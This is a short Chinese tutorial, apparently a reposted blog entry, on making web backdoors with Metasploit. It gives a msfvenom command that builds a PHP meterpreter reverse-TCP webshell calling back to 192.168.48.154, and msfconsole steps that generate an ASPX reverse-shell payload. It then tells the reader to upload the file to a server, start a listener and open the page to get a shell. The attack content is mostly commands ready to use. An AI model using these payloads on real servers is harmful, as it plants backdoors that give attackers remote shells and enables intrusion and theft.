码迷,mamicode.com
首页 > Web开发 > 详细

msfconsole web后门

时间:2019-10-10 15:36:22      阅读:130      评论:0      收藏:0      [点我收藏+]

标签:erp   就是   php   有一个   div   上传   reverse   class   www   

一、PHP后门

在meterpreter中有一个名为PHP meterpreter的payload,利用这个可以成功反弹。步骤如下:

  1. 使用msfvenom 创建一个webshell.php

  2. 上传到服务器

  3.开始监听

  4.访问webshell.php的页面

  5. 获得反弹Shell

payload :

 msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.48.154 -f raw > webshell.php
cp webshell.php /var/www/html

开始监听得到shell:

技术图片

 

 二、 aspx 后门

  步骤与前面大致相同,就是payload有点小小区别吧。

按着步骤敲吧,

use windows/shell_reverse_tcp
info
set lhost 192.168.48.154
set lport 4444
save
generate -f aspx (或者asp)

 最后将生成的payload 复制出来上传到服务器,即可得到shelle

技术图片

 

msfconsole web后门

标签:erp   就是   php   有一个   div   上传   reverse   class   www   

原文地址:https://www.cnblogs.com/kuaile1314/p/11648136.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!